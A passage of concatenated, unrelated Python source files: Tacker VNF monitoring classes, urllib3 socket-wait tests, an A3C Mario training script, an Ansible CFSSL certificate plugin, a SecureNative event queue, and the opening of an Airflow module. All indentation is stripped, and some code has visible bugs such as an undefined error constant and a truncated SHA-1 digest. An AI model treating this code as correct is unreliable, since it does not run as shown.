vnfm_utils.log_events(t_context.get_admin_context(),
new_vnf['vnf'],
constants.RES_EVT_MONITOR, evt_details)
def delete_hosting_vnf(self, vnf_id):
LOG.debug('deleting vnf_id %(vnf_id)s', {'vnf_id': vnf_id})
with self._lock:
hosting_vnf = VNFMonitor._hosting_vnfs.pop(vnf_id, None)
if hosting_vnf:
LOG.debug('deleting vnf_id %(vnf_id)s, Mgmt IP %(ips)s',
{'vnf_id': vnf_id,
'ips': hosting_vnf['mgmt_ip_addresses']})
def update_hosting_vnf(self, updated_vnf_dict, evt_details=None):
with self._lock:
vnf_to_update = VNFMonitor._hosting_vnfs.get(
updated_vnf_dict.get('id'))
if vnf_to_update:
updated_vnf = copy.deepcopy(updated_vnf_dict)
vnf_to_update['vnf'] = updated_vnf
vnf_to_update['mgmt_ip_addresses'] = jsonutils.loads(
updated_vnf_dict['mgmt_ip_address'])
if evt_details is not None:
vnfm_utils.log_events(t_context.get_admin_context(),
vnf_to_update['vnf'],
constants.RES_EVT_HEAL,
evt_details=evt_details)
def run_monitor(self, hosting_vnf):
mgmt_ips = hosting_vnf['mgmt_ip_addresses']
vdupolicies = hosting_vnf['monitoring_policy']['vdus']
vnf_delay = hosting_vnf['monitoring_policy'].get(
'monitoring_delay', self.boot_wait)
for vdu in vdupolicies:
if hosting_vnf.get('dead') or (
hosting_vnf['vnf']['status']) == constants.PENDING_HEAL:
return
policy = vdupolicies[vdu]
for driver in policy:
params = policy[driver].get('monitoring_params', {})
vdu_delay = params.get('monitoring_delay', vnf_delay)
if not timeutils.is_older_than(hosting_vnf['boot_at'],
vdu_delay):
continue
actions = policy[driver].get('actions', {})
params['mgmt_ip'] = mgmt_ips[vdu]
driver_return = self.monitor_call(driver,
hosting_vnf['vnf'],
params)
LOG.debug('driver_return %s', driver_return)
if driver_return in actions:
action = actions[driver_return]
hosting_vnf['action_cb'](action, vdu_name=vdu)
def mark_dead(self, vnf_id):
VNFMonitor._hosting_vnfs[vnf_id]['dead'] = True
def _invoke(self, driver, **kwargs):
method = inspect.stack()[1][3]
return self._monitor_manager.invoke(
driver, method, **kwargs)
def monitor_get_config(self, vnf_dict):
return self._invoke(
vnf_dict, monitor=self, vnf=vnf_dict)
def monitor_url(self, vnf_dict):
return self._invoke(
vnf_dict, monitor=self, vnf=vnf_dict)
def monitor_call(self, driver, vnf_dict, kwargs):
return self._invoke(driver,
vnf=vnf_dict, kwargs=kwargs)
class VNFAppMonitor(object):
"""VNF App monitor"""
OPTS = [
cfg.ListOpt(
'app_monitor_driver', default=['zabbix'],
help=_('App monitoring driver to communicate with '
'Hosting VNF/logical service '
'instance tacker plugin will use')),
]
cfg.CONF.register_opts(OPTS, 'tacker')
def __init__(self):
self._application_monitor_manager = driver_manager.DriverManager(
'tacker.tacker.app_monitor.drivers',
cfg.CONF.tacker.app_monitor_driver)
def _create_app_monitoring_dict(self, dev_attrs, mgmt_ip_address):
app_policy = 'app_monitoring_policy'
appmonitoring_dict = ast.literal_eval(
dev_attrs[app_policy].decode('utf-8'))
vdulist = appmonitoring_dict['vdus'].keys()
for vduname in vdulist:
temp = ast.literal_eval(mgmt_ip_address)
appmonitoring_dict['vdus'][vduname]['mgmt_ip'] = temp[vduname]
return appmonitoring_dict
def create_app_dict(self, context, vnf_dict):
dev_attrs = vnf_dict['attributes']
mgmt_ip_address = vnf_dict['mgmt_ip_address'].decode("utf-8")
return self._create_app_monitoring_dict(dev_attrs, mgmt_ip_address)
def _invoke(self, driver, **kwargs):
method = inspect.stack()[1][3]
return self._application_monitor_manager.\
invoke(driver, method, **kwargs)
def add_to_appmonitor(self, applicationvnfdict, vnf_dict):
vdunode = applicationvnfdict['vdus'].keys()
driver = applicationvnfdict['vdus'][vdunode[0]]['name']
kwargs = applicationvnfdict
return self._invoke(driver, vnf=vnf_dict, kwargs=kwargs)
class VNFAlarmMonitor(object):
"""VNF Alarm monitor"""
OPTS = [
cfg.ListOpt(
'alarm_monitor_driver', default=['ceilometer'],
help=_('Alarm monitoring driver to communicate with '
'Hosting VNF/logical service '
'instance tacker plugin will use')),
]
cfg.CONF.register_opts(OPTS, 'tacker')
# get alarm here
def __init__(self):
self._alarm_monitor_manager = driver_manager.DriverManager(
'tacker.tacker.alarm_monitor.drivers',
cfg.CONF.tacker.alarm_monitor_driver)
def update_vnf_with_alarm(self, plugin, context, vnf, policy_dict):
triggers = policy_dict['triggers']
alarm_url = dict()
for trigger_name, trigger_dict in triggers.items():
params = dict()
params['vnf_id'] = vnf['id']
params['mon_policy_name'] = trigger_name
driver = trigger_dict['event_type']['implementation']
# TODO(Tung Doan) trigger_dict.get('actions') needs to be used
policy_action = trigger_dict.get('action')
if len(policy_action) == 0:
vnfm_utils.log_events(t_context.get_admin_context(), vnf,
constants.RES_EVT_MONITOR,
"Alarm not set: policy action missing")
return
# Other backend policies with the construct (policy, action)
# ex: (SP1, in), (SP1, out)
def _refactor_backend_policy(bk_policy_name, bk_action_name):
policy = '%(policy_name)s-%(action_name)s' % {
'policy_name': bk_policy_name,
'action_name': bk_action_name}
return policy
for index, policy_action_name in enumerate(policy_action):
filters = {'name': policy_action_name}
bkend_policies =\
plugin.get_vnf_policies(context, vnf['id'], filters)
if bkend_policies:
bkend_policy = bkend_policies[0]
if bkend_policy['type'] == constants.POLICY_SCALING:
cp = trigger_dict['condition'].\
get('comparison_operator')
scaling_type = 'out' if cp == 'gt' else 'in'
policy_action[index] = _refactor_backend_policy(
policy_action_name, scaling_type)
# Support multiple action. Ex: respawn % notify
action_name = '%'.join(policy_action)
params['mon_policy_action'] = action_name
alarm_url[trigger_name] =\
self.call_alarm_url(driver, vnf, params)
details = "Alarm URL set successfully: %s" % alarm_url
vnfm_utils.log_events(t_context.get_admin_context(), vnf,
constants.RES_EVT_MONITOR, details)
return alarm_url
def process_alarm_for_vnf(self, vnf, trigger):
"""call in plugin"""
params = trigger['params']
mon_prop = trigger['trigger']
alarm_dict = dict()
alarm_dict['alarm_id'] = params['data'].get('alarm_id')
alarm_dict['status'] = params['data'].get('current')
trigger_name, trigger_dict = list(mon_prop.items())[0]
driver = trigger_dict['event_type']['implementation']
return self.process_alarm(driver, vnf, alarm_dict)
def _invoke(self, driver, **kwargs):
method = inspect.stack()[1][3]
return self._alarm_monitor_manager.invoke(
driver, method, **kwargs)
def call_alarm_url(self, driver, vnf_dict, kwargs):
return self._invoke(driver,
vnf=vnf_dict, kwargs=kwargs)
def process_alarm(self, driver, vnf_dict, kwargs):
return self._invoke(driver,
vnf=vnf_dict, kwargs=kwargs)
class VNFReservationAlarmMonitor(VNFAlarmMonitor):
"""VNF Reservation Alarm monitor"""
def update_vnf_with_reservation(self, plugin, context, vnf, policy_dict):
alarm_url = dict()
def create_alarm_action(action, action_list, scaling_type):
params = dict()
params['vnf_id'] = vnf['id']
params['mon_policy_name'] = action
driver = 'ceilometer'
def _refactor_backend_policy(bk_policy_name, bk_action_name):
policy = '%(policy_name)s%(action_name)s' % {
'policy_name': bk_policy_name,
'action_name': bk_action_name}
return policy
for index, policy_action_name in enumerate(action_list):
filters = {'name': policy_action_name}
bkend_policies = \
plugin.get_vnf_policies(context, vnf['id'], filters)
if bkend_policies:
if constants.POLICY_SCALING in str(bkend_policies[0]):
action_list[index] = _refactor_backend_policy(
policy_action_name, scaling_type)
# Support multiple action. Ex: respawn % notify
action_name = '%'.join(action_list)
params['mon_policy_action'] = action_name
alarm_url[action] = \
self.call_alarm_url(driver, vnf, params)
details = "Alarm URL set successfully: %s" % alarm_url
vnfm_utils.log_events(t_context.get_admin_context(), vnf,
constants.RES_EVT_MONITOR,
details)
before_end_action = policy_dict['reservation']['before_end_actions']
end_action = policy_dict['reservation']['end_actions']
start_action = policy_dict['reservation']['start_actions']
scaling_policies = \
plugin.get_vnf_policies(
context, vnf['id'], filters={
'type': constants.POLICY_SCALING})
if len(scaling_policies) == 0:
raise exceptions.VnfPolicyNotFound(
policy=constants.POLICY_SCALING, vnf_id=vnf['id'])
for scaling_policy in scaling_policies:
# validating start_action for scale-out policy action
if scaling_policy['name'] not in start_action:
raise exceptions.Invalid(
'Not a valid template: start_action must contain'
' %s as scaling-out action' % scaling_policy['name'])
# validating before_end and end_actions for scale-in policy action
if scaling_policy['name'] not in before_end_action:
if scaling_policy['name'] not in end_action:
raise exceptions.Invalid(
'Not a valid template:'
' before_end_action or end_action'
' should contain scaling policy: %s'
% scaling_policy['name'])
for action in constants.RESERVATION_POLICY_ACTIONS:
scaling_type = "-out" if action == 'start_actions' else "-in"
create_alarm_action(action, policy_dict[
'reservation'][action], scaling_type)
return alarm_url
def process_alarm_for_vnf(self, vnf, trigger):
"""call in plugin"""
params = trigger['params']
alarm_dict = dict()
alarm_dict['alarm_id'] = params['data'].get('alarm_id')
alarm_dict['status'] = params['data'].get('current')
driver = 'ceilometer'
return self.process_alarm(driver, vnf, alarm_dict)
class VNFMaintenanceAlarmMonitor(VNFAlarmMonitor):
"""VNF Maintenance Alarm monitor"""
def update_vnf_with_maintenance(self, vnf, vdu_names):
maintenance = dict()
vdus = dict()
params = dict()
params['vnf_id'] = vnf['id']
params['mon_policy_name'] = 'maintenance'
params['mon_policy_action'] = vnf['tenant_id']
driver = 'ceilometer'
url = self.call_alarm_url(driver, vnf, params)
maintenance['url'] = url[:url.rindex('/')]
vdu_names.append('ALL')
for vdu in vdu_names:
access_key = ''.join(
random.SystemRandom().choice(
string.ascii_lowercase + string.digits)
for _ in range(8))
vdus[vdu] = access_key
maintenance.update({'vdus': vdus})
details = "Alarm URL set successfully: %s" % maintenance['url']
vnfm_utils.log_events(t_context.get_admin_context(), vnf,
constants.RES_EVT_MONITOR, details)
return maintenance
def process_alarm_for_vnf(self, vnf, trigger):
"""call in plugin"""
params = trigger['params']
alarm_dict = dict()
alarm_dict['alarm_id'] = params['data'].get('alarm_id')
alarm_dict['status'] = params['data'].get('current')
driver = 'ceilometer'
return self.process_alarm(driver, vnf, alarm_dict)
|
test_wait.py
|
import signal
import threading
import time
from socket import socket, socketpair
from types import FrameType
from typing import Callable, Generator, List, Tuple
import pytest
from urllib3.util.wait import (
_have_working_poll,
poll_wait_for_socket,
select_wait_for_socket,
wait_for_read,
wait_for_socket,
wait_for_write,
)
TYPE_SOCKET_PAIR = Tuple[socket, socket]
TYPE_WAIT_FOR = Callable[..., bool]
@pytest.fixture
def spair() -> Generator[TYPE_SOCKET_PAIR, None, None]:
a, b = socketpair()
yield a, b
a.close()
b.close()
variants: List[TYPE_WAIT_FOR] = [wait_for_socket, select_wait_for_socket]
if _have_working_poll():
variants.append(poll_wait_for_socket)
@pytest.mark.parametrize("wfs", variants)
def test_wait_for_socket(wfs: TYPE_WAIT_FOR, spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
with pytest.raises(RuntimeError):
wfs(a, read=False, write=False)
assert not wfs(a, read=True, timeout=0)
assert wfs(a, write=True, timeout=0)
b.send(b"x")
assert wfs(a, read=True, timeout=0)
assert wfs(a, read=True, timeout=10)
assert wfs(a, read=True, timeout=None)
# Fill up the socket with data
a.setblocking(False)
try:
while True:
a.send(b"x" * 999999)
except OSError:
pass
# Now it's not writable anymore
assert not wfs(a, write=True, timeout=0)
# But if we ask for read-or-write, that succeeds
assert wfs(a, read=True, write=True, timeout=0)
# Unless we read from it
assert a.recv(1) == b"x"
assert not wfs(a, read=True, write=True, timeout=0)
# But if the remote peer closes the socket, then it becomes readable
b.close()
assert wfs(a, read=True, timeout=0)
# Waiting for a socket that's actually been closed is just a bug, and
# raises some kind of helpful exception (exact details depend on the
# platform).
with pytest.raises(Exception):
wfs(b, read=True)
def test_wait_for_read_write(spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
assert not wait_for_read(a, 0)
assert wait_for_write(a, 0)
b.send(b"x")
assert wait_for_read(a, 0)
assert wait_for_write(a, 0)
# Fill up the socket with data
a.setblocking(False)
try:
while True:
a.send(b"x" * 999999)
except OSError:
pass
# Now it's not writable anymore
assert not wait_for_write(a, 0)
@pytest.mark.skipif(not hasattr(signal, "setitimer"), reason="need setitimer() support")
@pytest.mark.parametrize("wfs", variants)
def test_eintr(wfs: TYPE_WAIT_FOR, spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
interrupt_count = [0]
def handler(sig: int, frame: FrameType) -> None:
assert sig == signal.SIGALRM
interrupt_count[0] += 1
old_handler = signal.signal(signal.SIGALRM, handler)
try:
assert not wfs(a, read=True, timeout=0)
start = time.monotonic()
try:
# Start delivering SIGALRM 10 times per second
signal.setitimer(signal.ITIMER_REAL, 0.1, 0.1)
# Sleep for 1 second (we hope!)
wfs(a, read=True, timeout=1)
finally:
# Stop delivering SIGALRM
signal.setitimer(signal.ITIMER_REAL, 0)
end = time.monotonic()
dur = end - start
assert 0.9 < dur < 3
finally:
signal.signal(signal.SIGALRM, old_handler)
assert interrupt_count[0] > 0
@pytest.mark.skipif(not hasattr(signal, "setitimer"), reason="need setitimer() support")
@pytest.mark.parametrize("wfs", variants)
def test_eintr_zero_timeout(wfs: TYPE_WAIT_FOR, spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
interrupt_count = [0]
def handler(sig: int, frame: FrameType) -> None:
assert sig == signal.SIGALRM
interrupt_count[0] += 1
old_handler = signal.signal(signal.SIGALRM, handler)
try:
assert not wfs(a, read=True, timeout=0)
try:
# Start delivering SIGALRM 1000 times per second,
# to trigger race conditions such as
# https://github.com/urllib3/urllib3/issues/1396.
signal.setitimer(signal.ITIMER_REAL, 0.001, 0.001)
# Hammer the system call for a while to trigger the
# race.
for i in range(100000):
wfs(a, read=True, timeout=0)
finally:
# Stop delivering SIGALRM
signal.setitimer(signal.ITIMER_REAL, 0)
finally:
signal.signal(signal.SIGALRM, old_handler)
assert interrupt_count[0] > 0
@pytest.mark.skipif(not hasattr(signal, "setitimer"), reason="need setitimer() support")
@pytest.mark.parametrize("wfs", variants)
def test_eintr_infinite_timeout(wfs: TYPE_WAIT_FOR, spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
interrupt_count = [0]
def handler(sig: int, frame: FrameType) -> None:
assert sig == signal.SIGALRM
interrupt_count[0] += 1
def make_a_readable_after_one_second() -> None:
time.sleep(1)
b.send(b"x")
old_handler = signal.signal(signal.SIGALRM, handler)
try:
assert not wfs(a, read=True, timeout=0)
start = time.monotonic()
try:
# Start delivering SIGALRM 10 times per second
signal.setitimer(signal.ITIMER_REAL, 0.1, 0.1)
# Sleep for 1 second (we hope!)
thread = threading.Thread(target=make_a_readable_after_one_second)
thread.start()
wfs(a, read=True)
finally:
# Stop delivering SIGALRM
signal.setitimer(signal.ITIMER_REAL, 0)
thread.join()
end = time.monotonic()
dur = end - start
assert 0.9 < dur < 3
finally:
signal.signal(signal.SIGALRM, old_handler)
assert interrupt_count[0] > 0
|
train.py
|
"""
@author: Viet Nguyen <[email protected]>
From: https://github.com/uvipen/Super-mario-bros-A3C-pytorch
Modified for Benchmarking Reinforcement Learning Algorithms in NES Games by Erin-Louise Connolly
"""
import os
import argparse
import torch
from src.env import create_train_env
from src.model import ActorCritic
from src.optimizer import GlobalAdam
from src.process import local_train, local_test
import torch.multiprocessing as _mp
import shutil,csv,time,sys
from datetime import datetime
import numpy as np
from src.helpers import JoypadSpace, SIMPLE_MOVEMENT, COMPLEX_MOVEMENT, RIGHT_ONLY
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['DISPLAY'] = ':1'
def get_args():
timestr = time.strftime("%Y%m%d-%H%M%S")
parser = argparse.ArgumentParser(
"""Implementation of model described in the paper: Asynchronous Methods for Deep Reinforcement Learning for Super Mario Bros""")
parser.add_argument("--world", type=int, default=1)
parser.add_argument("--stage", type=int, default=1)
parser.add_argument("--action_type", type=str, default="complex")
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gamma', type=float, default=0.9, help='discount factor for rewards')
parser.add_argument('--tau', type=float, default=1.0, help='parameter for GAE')
parser.add_argument('--beta', type=float, default=0.01, help='entropy coefficient')
parser.add_argument("--num_local_steps", type=int, default=50)
parser.add_argument("--num_global_steps", type=int, default=2e6)
parser.add_argument("--num_processes", type=int, default=4)
parser.add_argument("--save_interval", type=int, default=2000, help="Number of steps between savings")
parser.add_argument("--max_actions", type=int, default=200, help="Maximum repetition steps in test phase")
parser.add_argument("--log_path", type=str, default="tensorboard/a3c_super_mario_bros")
parser.add_argument("--timestr", type=str, default=timestr)
parser.add_argument("--saved_path", type=str, default="trained_models/"+ timestr)
parser.add_argument("--load_from_previous_stage", type=bool, default=False,
help="Load weight from previous trained stage")
parser.add_argument("--use_gpu", type=bool, default=True)
args = parser.parse_args()
return args
def train(opt):
seed = 123
if torch.cuda.is_available():
torch.cuda.manual_seed(seed)
print("using cuda")
else:
torch.manual_seed(seed)
print("not using cuda")
opt.saved_path = os.getcwd() + '/arkanoid/a3c/' + opt.saved_path
if opt.action_type == "right":
actions = RIGHT_ONLY
elif opt.action_type == "simple":
actions = SIMPLE_MOVEMENT
else:
actions = COMPLEX_MOVEMENT
start_time = time.time()
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
start_time = time.time()
if not os.path.isdir(opt.saved_path):
os.makedirs(opt.saved_path)
mp = _mp.get_context("spawn")
env, num_states, num_actions = create_train_env(opt.world, opt.stage,opt.action_type)
global_model = ActorCritic(num_states, num_actions)
if torch.cuda.is_available():
global_model.cuda()
global_model.share_memory()
optimizer = GlobalAdam(global_model.parameters(), lr=opt.lr)
processes = []
for index in range(opt.num_processes):
if index == 0:
process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer, True))
else:
process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer))
process.start()
processes.append(process)
process = mp.Process(target=local_test, args=(opt.num_processes, opt, global_model))
process.start()
processes.append(process)
for process in processes:
process.join()
if __name__ == "__main__":
opt = get_args()
train(opt)
|
cfssl.py
|
# Ansible action plugin to generate certificates securely using a remote CFSSL
# service.
#
# * Mutual TLS auth between client and server.
# * Certificates are generated on the master (local machine) and stored
# in variables.
# * Private keys never stored on local disk.
#
# This action does not execute any modules. The certificate and private key
# are returned as part of the result.
import hashlib, json, os, re, sys, threading, traceback
from collections import namedtuple
from urlparse import urlparse
from ansible.plugins.action import ActionBase
from ansible.utils.display import Display
from concurrent.futures import Future
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from OpenSSL import SSL
from twisted.internet import defer, reactor, ssl, task
from twisted.python import threadable
from twisted.web.client import getPage
BACKEND = default_backend()
ENCODING_PEM = serialization.Encoding.PEM
FORMAT_PKCS8 = serialization.PrivateFormat.PKCS8
display = Display()
threadable.init(1)
E_HOSTPORT = 'expected HOST:PORT but got %r'
E_LOADPEM = 'failed to load %r PEM: %s'
E_SHA1ERR = '%s SHA-1 mismatch. Expected %s got %s'
TLS_OPTIONS = dict(extraCertificateOptions = dict(method = SSL.TLSv1_2_METHOD))
PEM_TYPES = (
'CERTIFICATE',
'PRIVATE KEY',
'EC PRIVATE KEY',
'RSA PRIVATE KEY',
'DH PARAMETERS'
)
RE_SP = re.compile('\s+', re.M)
RE_SERVICE = re.compile('[\w.-]+:\d+')
RE_PEM = re.compile(
'-----BEGIN (' +
'|'.join(PEM_TYPES) +
')-----\r?\n(.+?)\r?\n-----END \\1-----\r?\n?', re.DOTALL)
Pem = namedtuple('Pem', 'raw, type, bytes')
# The Twisted reactor is started on a background thread, and futures are used
# to adapt the synchronous Ansible code to the asynchronous Twisted code.
#
# Using Twisted since its TLS implementation allows establishing a mutual TLS
# client connection while passing the PEM private key and cert to OpenSSL in a
# variable instead of a disk file, since we never want the CA client's private
# key to hit the local or remote disk.
_REACTOR = None
def start_reactor():
'''
Start the reactor on a background thread so our actions are executed on
the main thread.
'''
global _REACTOR
if reactor.running:
return
if not _REACTOR or not _REACTOR.isAlive():
run = lambda: reactor.run(installSignalHandlers=False)
_REACTOR = threading.Thread(name='Reactor', target=run)
_REACTOR.start()
def stop_reactor():
reactor.callFromThread(reactor.stop)
def invoke(func, *args, **kw):
'''
Invokes a function that (may or may not) call twisted asynchronous code
and adapts the (possibly deferred) result to a Future.
'''
future = Future()
@defer.inlineCallbacks
def adapt_future():
try:
res = yield defer.maybeDeferred(func, *args, **kw)
future.set_result(res)
except Exception as e:
future.set_exception(e)
reactor.callFromThread(adapt_future)
return future
class Client(object):
'''
Mutual TLS CFSSL client to issue new certificates.
'''
def __init__(self, base_url, profile, cert_key, ca_bundle):
self.base_url = base_url
self.profile = profile
self.cert_key = cert_key
self.ca_bundle = ca_bundle
def get_host(self):
u = urlparse(self.base_url)
parts = u.netloc.split(':', 1)
return unicode(parts[0])
@defer.inlineCallbacks
def getcert(self, csr):
host = self.get_host()
trustRoot = ssl.trustRootFromCertificates(self.ca_bundle)
opts = ssl.optionsForClientTLS(host, trustRoot, self.cert_key, **TLS_OPTIONS)
req = {'request': csr, 'profile': self.profile}
url = self.base_url + '/api/v1/cfssl/newcert'
res = yield getPage(url,
contextFactory=opts,
method='POST',
postdata=json.dumps(req))
defer.returnValue(res)
def pem_split(s):
return list(Pem(m.group(0), m.group(1), m.group(2)) for m in RE_PEM.finditer(s))
def fail(msg):
return dict(failed=True, msg=msg)
def format_msg(rec):
r = ''
for m in rec.get('messages', []):
r += '%s: %s\n' % (m.get('code'), m.get('message'))
return r
def getdeep(d, key, defval=''):
for k in key.split('.'):
d = d.get(k, {})
return d if d else defval
def sha1(data):
return hashlib.sha1(data).hexdigest()[1:].upper()
def encrypt_private_key(key_pem, passphrase):
key_pem = key_pem.encode('ascii')
passphrase = passphrase.encode('utf-8')
key = serialization.load_pem_private_key(key_pem, None, BACKEND)
return key.private_bytes(ENCODING_PEM, FORMAT_PKCS8,
serialization.BestAvailableEncryption(passphrase))
def extract_certkey(rec):
r = rec.get('result', {})
# extract the cert, key and csr values
cert = getdeep(r, 'certificate', '')
key = getdeep(r, 'private_key', '')
csr = getdeep(r, 'certificate_request', '')
# TODO: Validate the signatures on the certificate and csr.
return (cert, key, csr), None
class ActionModule(ActionBase):
ARGS = set(['service', 'auth', 'profile', 'csr'])
AUTH_ARGS = set(['cert', 'key', 'cacert'])
TRANSFER_FILES = False
def __init__(self, *n, **kw):
# force 'no_log' to be true, since we want to return the private key as
# a result variable and don't ever want it logged.
# TODO: clearner way to do this?
ctx = kw.get('play_context')
if ctx:
ctx.no_log = True
ActionBase.__init__(self, *n, **kw)
def arg(self, name):
return self._task.args.get(name, None)
def check_args(self, names, collection):
for arg in names:
if arg not in collection:
return fail('%r is a required argument' % arg)
def load_file(self, path):
root = self._loader.get_basedir()
if self._task._role is not None:
root = self._task._role._role_path
realpath = self._loader.path_dwim_relative(root, 'files', path)
return open(realpath, 'rb').read()
def run(self, tmp=None, task_vars=None):
try:
return self._run(tmp, task_vars)
except Exception as e:
# since this action always runs in no_log=True mode, manually
# print the real exception, if any.
display.error(traceback.format_exc())
return fail('Failed!')
def _run(self, tmp=None, task_vars=None):
err = self.check_args(self.ARGS, self._task.args)
if err:
return err
getarg = lambda n, d=None: self._task.args.get(n, d)
service = getarg('service')
auth = getarg('auth')
profile = getarg('profile')
csr_arg = getarg('csr')
show = getarg('show', False)
if isinstance(show, basestring):
show = show in ('yes','true','1')
# optional passphrase to protect generated private key
passphrase = getarg('passphrase')
err = self.check_args(self.AUTH_ARGS, auth)
if err:
return err
cert = auth.get('cert')
key = auth.get('key')
cacert = auth.get('cacert')
# validate some args
if not RE_SERVICE.match(service):
return fail(E_SERVICE % service)
service = service.encode('utf-8')
try:
cert_key = ssl.PrivateCertificate.loadPEM(cert + '\n' + key)
except Exception as e:
return fail(E_LOADPEM % ('cert/key', traceback.format_exc()))
try:
ca_bundle = [ssl.Certificate.loadPEM(p.raw) for p in pem_split(cacert)]
except Exception as e:
return fail(E_LOADPEM % ('cacert', traceback.format_exc()))
if isinstance(csr_arg, dict):
# csr definition is inline yaml object
csr = csr_arg
elif isinstance(csr_arg, basestring):
# assume csr string is a path to a disk location
data = self.load_file(csr_arg)
csr = json.loads(data)
# build the client talking to the service url
base_url = 'https://%s' % service
client = Client(base_url, profile, cert_key, ca_bundle)
# contact the cfssl service to issue a new certificate
try:
start_reactor()
data = invoke(client.getcert, csr).result()
record = json.loads(data)
finally:
stop_reactor()
# extract warning messages, if any, from cfssl result
msg = format_msg(record)
if msg:
display.warning('CFSSL MESSAGES :' + msg)
ck, err = extract_certkey(record)
if err:
msg = 'FAILED TO EXTRACT VALUES: %s' % err
display.error(msg)
return fail(msg)
cert, key, csr = ck
if not cert:
return fail('Failed to generate CERTIFICATE')
if not key:
return fail('Failed to generate PRIVATE KEY')
if not csr:
return fail('Failed to generate CSR')
# optional passphrase encryption with PKCS#8 AES256 CBC
if passphrase:
key = encrypt_private_key(key, passphrase)
if show:
display.display(cert + '\n\n' + key + '\n\n' + csr)
# return the certificate and key
return dict(cert = cert, key = key, csr = csr)
|
event_manager.py
|
import json
import threading
import time
from securenative.config.securenative_options import SecureNativeOptions
from securenative.http.securenative_http_client import SecureNativeHttpClient
from securenative.logger import Logger
class QueueItem:
def __init__(self, url, body, retry):
self.url = url
self.body = body
self.retry = retry
class EventManager:
def __init__(self, options=SecureNativeOptions(), http_client=None):
if options.api_key is None:
raise ValueError('API key cannot be None, please get your API key from SecureNative console.')
if not http_client:
self.http_client = SecureNativeHttpClient(options)
else:
self.http_client = http_client
self.queue = list()
self.thread = threading.Thread(target=self.run, daemon=True)
self.thread.start()
self.options = options
self.send_enabled = False
self.attempt = 0
self.coefficients = [1, 1, 2, 3, 5, 8, 13]
self.thread = None
self.interval = options.interval
def send_async(self, event, resource_path):
if self.options.disable:
Logger.warning("SDK is disabled. no operation will be performed")
return
item = QueueItem(
resource_path,
json.dumps(EventManager.serialize(event)),
False
)
self.queue.append(item)
if self._is_queue_full():
self.queue = self.queue[:len(self.queue - 1)]
def flush(self):
for item in self.queue:
self.http_client.post(item.url, item.body)
def send_sync(self, event, resource_path):
if self.options.disable:
Logger.warning("SDK is disabled. no operation will be performed")
return
Logger.debug("Attempting to send event {}".format(event))
res = self.http_client.post(
resource_path,
json.dumps(EventManager.serialize(event))
)
if res is None or res.status_code != 200:
Logger.info("SecureNative failed to call endpoint {} with event {}.".format(resource_path, event))
return res
def _is_queue_full(self):
return len(self.queue) > self.options.max_events
def run(self):
while True:
if len(self.queue) > 0 and self.send_enabled:
for item in self.queue:
try:
res = self.http_client.post(item.url, item.body)
if res.status_code == 401:
item.retry = False
elif res.status_code != 200:
item.retry = True
self.queue.remove(item)
Logger.debug("Event successfully sent; {}".format(item.body))
except Exception as e:
Logger.error("Failed to send event; {}".format(e))
if item.retry:
if len(self.coefficients) == self.attempt + 1:
self.attempt = 0
back_off = self.coefficients[self.attempt] * self.options.interval
Logger.debug("Automatic back-off of {}".format(back_off))
self.send_enabled = False
time.sleep(back_off)
self.send_enabled = True
time.sleep(self.interval/1000)
def start_event_persist(self):
Logger.debug("Starting automatic event persistence")
if self.options.auto_send or self.send_enabled:
self.send_enabled = True
else:
Logger.debug("Automatic event persistence is disabled, you should persist events manually")
def stop_event_persist(self):
if self.send_enabled:
Logger.debug("Attempting to stop automatic event persistence")
try:
self.flush()
if self.thread:
self.thread.stop()
except ValueError as e:
Logger.error("Could not stop event scheduler; {}".format(e))
Logger.debug("Stopped event persistence")
@staticmethod
def serialize(obj):
return {
"rid": obj.rid,
"eventType": obj.event_type if isinstance(obj.event_type, str) else obj.event_type.value,
"userId": obj.user_id,
"userTraits": {
"name": obj.user_traits.name if obj.user_traits else "",
"email": obj.user_traits.email if obj.user_traits else "",
"phone": obj.user_traits.phone if obj.user_traits else "",
"createdAt": obj.user_traits.created_at if obj.user_traits else "",
},
"request": {
"cid": obj.request.cid if obj.request else "",
"vid": obj.request.vid if obj.request else "",
"fp": obj.request.fp if obj.request else "",
"ip": obj.request.ip if obj.request else "",
"remoteIp": obj.request.remote_ip if obj.request else "",
"method": obj.request.method if obj.request else "",
"url": obj.request.url if obj.request else "",
"headers": obj.request.headers if obj.request else None
},
"timestamp": obj.timestamp,
"properties": obj.properties,
}
|
dag_processing.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import inspect
import logging
import multiprocessing
import os
import signal
import sys
import time
from abc import ABCMeta, abstractmethod
from collections import defaultdict
from datetime import datetime, timedelta
from importlib import import_module
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Any, Callable, Dict, List, NamedTuple, Optional, Tuple, Union, cast
from setproctitle import setproctitle # pylint: disable=no-name-in-module
from sqlalchemy import or_
from tabulate import tabulate
import airflow.models
from airflow.configuration import conf
from airflow.models import DagModel, errors
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.settings import STORE_DAG_CODE
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.callback_requests import CallbackRequest, SlaCallbackRequest, TaskCallbackRequest
from airflow.utils.file import list_py_file_paths
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.process_utils import kill_child_processes_by_pids, reap_process_group
from airflow.utils.session import provide_session
from airflow.utils.state import State
class AbstractDagFileProcessorProcess(metaclass=ABCMeta):
